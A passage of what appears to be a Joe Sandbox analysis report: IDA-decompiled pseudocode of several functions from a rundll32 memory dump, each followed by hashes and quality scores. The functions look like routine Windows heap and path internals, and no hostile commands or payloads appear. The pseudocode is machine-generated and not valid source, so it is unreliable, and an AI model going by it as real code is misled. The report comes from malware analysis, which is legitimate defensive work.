                                                                                                                				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                                                                                				E0444FA60( &_v156, 0, _t87);
                                                                                                                				_t13 = _t77 + 0x30; // 0x3db8
                                                                                                                				_t85 =  &_v156;
                                                                                                                				_v36 =  *_t13;
                                                                                                                				_v28 = _v168;
                                                                                                                				_v32 = 0;
                                                                                                                				_v24 = 0;
                                                                                                                				_v20 = _v158;
                                                                                                                				_v160 = 0;
                                                                                                                				while(1) {
                                                                                                                					_push( &_v164);
                                                                                                                					_push(_t87);
                                                                                                                					_push(_t85);
                                                                                                                					_push(0x18);
                                                                                                                					_push( &_v36);
                                                                                                                					_push(0x1e);
                                                                                                                					_t88 = E0444B0B0();
                                                                                                                					if(_t88 != 0xc0000023) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					if(_t85 !=  &_v156) {
                                                                                                                						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                                                                                					}
                                                                                                                					_t84 = L04424620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                                                                                					_v168 = _v164;
                                                                                                                					if(_t84 == 0) {
                                                                                                                						_t88 = 0xc0000017;
                                                                                                                						goto L19;
                                                                                                                					} else {
                                                                                                                						_t74 = _v160 + 1;
                                                                                                                						_v160 = _t74;
                                                                                                                						if(_t74 >= 0x10) {
                                                                                                                							L19:
                                                                                                                							_t86 = E0440CCC0(_t88);
                                                                                                                							if(_t86 != 0) {
                                                                                                                								L8:
                                                                                                                								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                                                                                								_t30 = _t77 + 0x24; // 0x44f8504
                                                                                                                								E0441FFB0(_t77, _t84, _t30);
                                                                                                                								if(_t84 != 0 && _t84 !=  &_v156) {
                                                                                                                									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                                                                                								}
                                                                                                                								if(_t86 != 0) {
                                                                                                                									goto L12;
                                                                                                                								} else {
                                                                                                                									goto L11;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L6:
                                                                                                                							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                                                                                							if(_v164 != 0) {
                                                                                                                								_t83 = _t84;
                                                                                                                								E04434F49(_t77, _t84);
                                                                                                                							}
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						_t87 = _v168;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(_t88 != 0) {
                                                                                                                					goto L19;
                                                                                                                				}
                                                                                                                				goto L6;
                                                                                                                			}



























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E04418A0A(intOrPtr* __ecx, signed int __edx) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v524;
                                                                                                                				signed int _v528;
                                                                                                                				void* _v532;
                                                                                                                				char _v536;
                                                                                                                				char _v540;
                                                                                                                				char _v544;
                                                                                                                				intOrPtr* _v548;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t44;
                                                                                                                				void* _t46;
                                                                                                                				void* _t48;
                                                                                                                				signed int _t53;
                                                                                                                				signed int _t55;
                                                                                                                				intOrPtr* _t62;
                                                                                                                				void* _t63;
                                                                                                                				unsigned int _t75;
                                                                                                                				signed int _t79;
                                                                                                                				unsigned int _t81;
                                                                                                                				unsigned int _t83;
                                                                                                                				signed int _t84;
                                                                                                                				void* _t87;
                                                                                                                
                                                                                                                				_t76 = __edx;
                                                                                                                				_v8 =  *0x44fd360 ^ _t84;
                                                                                                                				_v536 = 0x200;
                                                                                                                				_t79 = 0;
                                                                                                                				_v548 = __edx;
                                                                                                                				_v544 = 0;
                                                                                                                				_t62 = __ecx;
                                                                                                                				_v540 = 0;
                                                                                                                				_v532 =  &_v524;
                                                                                                                				if(__edx == 0 || __ecx == 0) {
                                                                                                                					L6:
                                                                                                                					return E0444B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                                                                                				} else {
                                                                                                                					_v528 = 0;
                                                                                                                					E0441E9C0(1, __ecx, 0, 0,  &_v528);
                                                                                                                					_t44 = _v528;
                                                                                                                					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                                                                                					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                                                                                					_t46 = 0xa;
                                                                                                                					_t87 = _t81 - _t46;
                                                                                                                					if(_t87 > 0 || _t87 == 0) {
                                                                                                                						 *_v548 = 0x43e1180;
                                                                                                                						L5:
                                                                                                                						_t79 = 1;
                                                                                                                						goto L6;
                                                                                                                					} else {
                                                                                                                						_t48 = E04431DB5(_t62,  &_v532,  &_v536);
                                                                                                                						_t76 = _v528;
                                                                                                                						if(_t48 == 0) {
                                                                                                                							L9:
                                                                                                                							E04443C2A(_t81, _t76,  &_v544);
                                                                                                                							 *_v548 = _v544;
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						_t62 = _v532;
                                                                                                                						if(_t62 != 0) {
                                                                                                                							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                                                                                							_t53 =  *_t62;
                                                                                                                							_v528 = _t53;
                                                                                                                							if(_t53 != 0) {
                                                                                                                								_t63 = _t62 + 4;
                                                                                                                								_t55 = _v528;
                                                                                                                								do {
                                                                                                                									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                                                                                										if(E04418999(_t63,  &_v540) == 0) {
                                                                                                                											_t55 = _v528;
                                                                                                                										} else {
                                                                                                                											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                                                                                											_t55 = _v528;
                                                                                                                											if(_t75 >= _t83) {
                                                                                                                												_t83 = _t75;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                									_t63 = _t63 + 0x14;
                                                                                                                									_t55 = _t55 - 1;
                                                                                                                									_v528 = _t55;
                                                                                                                								} while (_t55 != 0);
                                                                                                                								_t62 = _v532;
                                                                                                                							}
                                                                                                                							if(_t62 !=  &_v524) {
                                                                                                                								L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                                                                                							}
                                                                                                                							_t76 = _t83 & 0x0000ffff;
                                                                                                                							_t81 = _t83 >> 0x10;
                                                                                                                						}
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044CAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed char _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				char* _t37;
                                                                                                                				void* _t47;
                                                                                                                				signed char _t51;
                                                                                                                				void* _t53;
                                                                                                                				char _t55;
                                                                                                                				intOrPtr _t57;
                                                                                                                				signed char _t61;
                                                                                                                				intOrPtr _t75;
                                                                                                                				void* _t76;
                                                                                                                				signed int _t81;
                                                                                                                				intOrPtr _t82;
                                                                                                                
                                                                                                                				_t53 = __ecx;
                                                                                                                				_t55 = 0;
                                                                                                                				_v20 = _v20 & 0;
                                                                                                                				_t75 = __edx;
                                                                                                                				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                                                                                                				_v24 = __edx;
                                                                                                                				_v12 = 0;
                                                                                                                				if((_t81 & 0x01000000) != 0) {
                                                                                                                					L5:
                                                                                                                					if(_a8 != 0) {
                                                                                                                						_t81 = _t81 | 0x00000008;
                                                                                                                					}
                                                                                                                					_t57 = E044CABF4(_t55 + _t75, _t81);
                                                                                                                					_v8 = _t57;
                                                                                                                					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                                                                                                						_t76 = 0;
                                                                                                                						_v16 = _v16 & 0;
                                                                                                                					} else {
                                                                                                                						_t59 = _t53;
                                                                                                                						_t76 = E044CAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                                                                                                						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                                                                                                							_t47 = E044CAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                                                                                                							_t61 = _v20;
                                                                                                                							if(_t61 != 0) {
                                                                                                                								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                                                                                                								if(E044ACB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                                                                                                									L044277F0(_t53, 0, _t76);
                                                                                                                									_t76 = 0;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t82 = _v8;
                                                                                                                					L16:
                                                                                                                					if(E04427D50() == 0) {
                                                                                                                						_t37 = 0x7ffe0380;
                                                                                                                					} else {
                                                                                                                						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                					}
                                                                                                                					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                                						E044C131B(_t53, _t76, _t82, _v16);
                                                                                                                					}
                                                                                                                					return _t76;
                                                                                                                				}
                                                                                                                				_t51 =  *(__ecx + 0x20);
                                                                                                                				_v20 = _t51;
                                                                                                                				if(_t51 == 0) {
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				_t81 = _t81 | 0x00000008;
                                                                                                                				if(E044ACB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                                                                                                					_t55 = _v12;
                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					_t82 = 0;
                                                                                                                					_t76 = 0;
                                                                                                                					_v16 = _v16 & 0;
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                			}




















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                • Instruction ID: e9255becacdfa5e8980b84008929860e56fa057ae07433698d1c717f5c91b45f
                                                                                                                • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                • Instruction Fuzzy Hash: 6531F579B001086BEF55CB65C845BBFFBAADF84314F09806FE905B7351EA74AD00C650
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E044CFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                                                                                                				char _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _t29;
                                                                                                                				char* _t32;
                                                                                                                				char* _t43;
                                                                                                                				signed int _t80;
                                                                                                                				signed int* _t84;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t56 = __edx;
                                                                                                                				_t84 = __ecx;
                                                                                                                				_t80 = E044CFD4E(__ecx, __edx);
                                                                                                                				_v12 = _t80;
                                                                                                                				if(_t80 != 0) {
                                                                                                                					_t29 =  *__ecx & _t80;
                                                                                                                					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                                                                                                					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                                                                                                						E044D0A13(__ecx, _t80, 0, _a4);
                                                                                                                						_t80 = 1;
                                                                                                                						if(E04427D50() == 0) {
                                                                                                                							_t32 = 0x7ffe0380;
                                                                                                                						} else {
                                                                                                                							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                						}
                                                                                                                						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                                							_push(3);
                                                                                                                							L21:
                                                                                                                							E044C1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                                                                                                						}
                                                                                                                						goto L22;
                                                                                                                					}
                                                                                                                					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                                                                                                						_t80 = E044D2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                                                                                                						if(_t80 != 0) {
                                                                                                                							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                                                                                                							_t77 = _v8;
                                                                                                                							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                                                                                                								E044CC8F7(_t66, _t77, 0);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t80 = E044CDBD2(__ecx[0xb], _t74, __edx, _a4);
                                                                                                                					}
                                                                                                                					if(E04427D50() == 0) {
                                                                                                                						_t43 = 0x7ffe0380;
                                                                                                                					} else {
                                                                                                                						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                					}
                                                                                                                					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                                                                                                						goto L22;
                                                                                                                					} else {
                                                                                                                						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                                                                                                						goto L21;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_push(__ecx);
                                                                                                                					_push(_t80);
                                                                                                                					E044CA80D(__ecx[0xf], 9, __edx, _t80);
                                                                                                                					L22:
                                                                                                                					return _t80;
                                                                                                                				}
                                                                                                                			}











                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                • Instruction ID: f9595bcff26d0c667121cd51396ca4600635a2f2edd0a0b47edf8694480aeaaf
                                                                                                                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                • Instruction Fuzzy Hash: BF31E73A300640AFEB619B69C854F6B7BA7EB85650F1C405FE9468B782DA78F845C720
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E044CEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v15;
                                                                                                                				char _v16;
                                                                                                                				intOrPtr _v19;
                                                                                                                				void* _v28;
                                                                                                                				intOrPtr _v36;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				signed char _t26;
                                                                                                                				signed int _t27;
                                                                                                                				char* _t40;
                                                                                                                				unsigned int* _t50;
                                                                                                                				intOrPtr* _t58;
                                                                                                                				unsigned int _t59;
                                                                                                                				char _t75;
                                                                                                                				signed int _t86;
                                                                                                                				intOrPtr _t88;
                                                                                                                				intOrPtr* _t91;
                                                                                                                
                                                                                                                				_t75 = __edx;
                                                                                                                				_t91 = __ecx;
                                                                                                                				_v12 = __edx;
                                                                                                                				_t50 = __ecx + 0x30;
                                                                                                                				_t86 = _a4 & 0x00000001;
                                                                                                                				if(_t86 == 0) {
                                                                                                                					E04422280(_t26, _t50);
                                                                                                                					_t75 = _v16;
                                                                                                                				}
                                                                                                                				_t58 = _t91;
                                                                                                                				_t27 = E044CE815(_t58, _t75);
                                                                                                                				_v8 = _t27;
                                                                                                                				if(_t27 != 0) {
                                                                                                                					E0440F900(_t91 + 0x34, _t27);
                                                                                                                					if(_t86 == 0) {
                                                                                                                						E0441FFB0(_t50, _t86, _t50);
                                                                                                                					}
                                                                                                                					_push( *((intOrPtr*)(_t91 + 4)));
                                                                                                                					_push( *_t91);
                                                                                                                					_t59 =  *(_v8 + 0x10);
                                                                                                                					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                                                                                                					_push(0x8000);
                                                                                                                					_t11 = _t53 - 1; // 0x0
                                                                                                                					_t12 = _t53 - 1; // 0x0
                                                                                                                					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                                                                                                					E044CAFDE( &_v12,  &_v16);
                                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                                					E044CBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                                                                                                					_t55 = _v36;
                                                                                                                					_t88 = _v36;
                                                                                                                					if(E04427D50() == 0) {
                                                                                                                						_t40 = 0x7ffe0388;
                                                                                                                					} else {
                                                                                                                						_t55 = _v19;
                                                                                                                						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                					}
                                                                                                                					if( *_t40 != 0) {
                                                                                                                						E044BFE3F(_t55, _t91, _v15, _t55);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					if(_t86 == 0) {
                                                                                                                						E0441FFB0(_t50, _t86, _t50);
                                                                                                                						_t75 = _v16;
                                                                                                                					}
                                                                                                                					_push(_t58);
                                                                                                                					_t88 = 0;
                                                                                                                					_push(0);
                                                                                                                					E044CA80D(_t91, 8, _t75, 0);
                                                                                                                				}
                                                                                                                				return _t88;
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                • Instruction ID: f55812c8debf529a2929677a80f95042eceb16ff7ccb2d9e54ddf254d3d67d52
                                                                                                                • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                • Instruction Fuzzy Hash: 7931E1366047059FDB29DF25C880A6BB7A9FBC0214F18492EE55687341EB31F809CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 69%
                                                                                                                			E044869A6(signed short* __ecx, void* __eflags) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed short _v28;
                                                                                                                				signed int _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				signed int _v40;
                                                                                                                				char* _v44;
                                                                                                                				signed int _v48;
                                                                                                                				intOrPtr _v52;
                                                                                                                				signed int _v56;
                                                                                                                				char _v60;
                                                                                                                				signed int _v64;
                                                                                                                				char _v68;
                                                                                                                				char _v72;
                                                                                                                				signed short* _v76;
                                                                                                                				signed int _v80;
                                                                                                                				char _v84;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t68;
                                                                                                                				intOrPtr _t73;
                                                                                                                				signed short* _t74;
                                                                                                                				void* _t77;
                                                                                                                				void* _t78;
                                                                                                                				signed int _t79;
                                                                                                                				signed int _t80;
                                                                                                                
                                                                                                                				_v8 =  *0x44fd360 ^ _t80;
                                                                                                                				_t75 = 0x100;
                                                                                                                				_v64 = _v64 & 0x00000000;
                                                                                                                				_v76 = __ecx;
                                                                                                                				_t79 = 0;
                                                                                                                				_t68 = 0;
                                                                                                                				_v72 = 1;
                                                                                                                				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                                                                                				_t77 = 0;
                                                                                                                				if(L04416C59(__ecx[2], 0x100, __eflags) != 0) {
                                                                                                                					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                                                					if(_t79 != 0 && E04486BA3() != 0) {
                                                                                                                						_push(0);
                                                                                                                						_push(0);
                                                                                                                						_push(0);
                                                                                                                						_push(0x1f0003);
                                                                                                                						_push( &_v64);
                                                                                                                						if(E04449980() >= 0) {
                                                                                                                							E04422280(_t56, 0x44f8778);
                                                                                                                							_t77 = 1;
                                                                                                                							_t68 = 1;
                                                                                                                							if( *0x44f8774 == 0) {
                                                                                                                								asm("cdq");
                                                                                                                								 *(_t79 + 0xf70) = _v64;
                                                                                                                								 *(_t79 + 0xf74) = 0x100;
                                                                                                                								_t75 = 0;
                                                                                                                								_t73 = 4;
                                                                                                                								_v60 =  &_v68;
                                                                                                                								_v52 = _t73;
                                                                                                                								_v36 = _t73;
                                                                                                                								_t74 = _v76;
                                                                                                                								_v44 =  &_v72;
                                                                                                                								 *0x44f8774 = 1;
                                                                                                                								_v56 = 0;
                                                                                                                								_v28 = _t74[2];
                                                                                                                								_v48 = 0;
                                                                                                                								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                                                                                								_v40 = 0;
                                                                                                                								_v32 = 0;
                                                                                                                								_v24 = 0;
                                                                                                                								_v16 = 0;
                                                                                                                								if(E0440B6F0(0x43ec338, 0x43ec288, 3,  &_v60) == 0) {
                                                                                                                									_v80 = _v80 | 0xffffffff;
                                                                                                                									_push( &_v84);
                                                                                                                									_push(0);
                                                                                                                									_push(_v64);
                                                                                                                									_v84 = 0xfa0a1f00;
                                                                                                                									E04449520();
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(_v64 != 0) {
                                                                                                                					_push(_v64);
                                                                                                                					E044495D0();
                                                                                                                					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                                                                                					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                                                                                				}
                                                                                                                				if(_t77 != 0) {
                                                                                                                					E0441FFB0(_t68, _t77, 0x44f8778);
                                                                                                                				}
                                                                                                                				_pop(_t78);
                                                                                                                				return E0444B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                                                                                			}

































                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d35313019700520097db991afb4ea01bc963be9a8a8a2939b37da0ce458a35b2
                                                                                                                • Instruction ID: 749b3a4940953d9cf21bd3b2331db29d2cd4d0f65e3543c3cb254cda3fb14204
                                                                                                                • Opcode Fuzzy Hash: d35313019700520097db991afb4ea01bc963be9a8a8a2939b37da0ce458a35b2
                                                                                                                • Instruction Fuzzy Hash: FD416AB1D00208AFEF14DFA6D940BEEBBF4EF88714F14812EE914A7251DB74A905CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E04405210(intOrPtr _a4, void* _a8) {
                                                                                                                				void* __ecx;
                                                                                                                				intOrPtr _t31;
                                                                                                                				signed int _t32;
                                                                                                                				signed int _t33;
                                                                                                                				intOrPtr _t35;
                                                                                                                				signed int _t52;
                                                                                                                				void* _t54;
                                                                                                                				void* _t56;
                                                                                                                				unsigned int _t59;
                                                                                                                				signed int _t60;
                                                                                                                				void* _t61;
                                                                                                                
                                                                                                                				_t61 = E044052A5(1);
                                                                                                                				if(_t61 == 0) {
                                                                                                                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                                                					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                                                                                					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                                                                                				} else {
                                                                                                                					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                                                                                					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                                                                                				}
                                                                                                                				_t60 = _t59 >> 1;
                                                                                                                				_t32 = 0x3a;
                                                                                                                				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                                                                                					_t52 = _t60 + _t60;
                                                                                                                					if(_a4 > _t52) {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					if(_t61 != 0) {
                                                                                                                						asm("lock xadd [esi], eax");
                                                                                                                						if((_t32 | 0xffffffff) == 0) {
                                                                                                                							_push( *((intOrPtr*)(_t61 + 4)));
                                                                                                                							E044495D0();
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						E0441EB70(_t54, 0x44f79a0);
                                                                                                                					}
                                                                                                                					_t26 = _t52 + 2; // 0xddeeddf0
                                                                                                                					return _t26;
                                                                                                                				} else {
                                                                                                                					_t52 = _t60 + _t60;
                                                                                                                					if(_a4 < _t52) {
                                                                                                                						if(_t61 != 0) {
                                                                                                                							asm("lock xadd [esi], eax");
                                                                                                                							if((_t32 | 0xffffffff) == 0) {
                                                                                                                								_push( *((intOrPtr*)(_t61 + 4)));
                                                                                                                								E044495D0();
                                                                                                                								L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							E0441EB70(_t54, 0x44f79a0);
                                                                                                                						}
                                                                                                                						return _t52;
                                                                                                                					}
                                                                                                                					L5:
                                                                                                                					_t33 = E0444F3E0(_a8, _t54, _t52);
                                                                                                                					if(_t61 == 0) {
                                                                                                                						E0441EB70(_t54, 0x44f79a0);
                                                                                                                					} else {
                                                                                                                						asm("lock xadd [esi], eax");
                                                                                                                						if((_t33 | 0xffffffff) == 0) {
                                                                                                                							_push( *((intOrPtr*)(_t61 + 4)));
                                                                                                                							E044495D0();
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t35 = _a8;
                                                                                                                					if(_t60 <= 1) {
                                                                                                                						L9:
                                                                                                                						_t60 = _t60 - 1;
                                                                                                                						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                                                                                						goto L10;
                                                                                                                					} else {
                                                                                                                						_t56 = 0x3a;
                                                                                                                						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                                                                                							 *((short*)(_t52 + _t35)) = 0;
                                                                                                                							L10:
                                                                                                                							return _t60 + _t60;
                                                                                                                						}
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
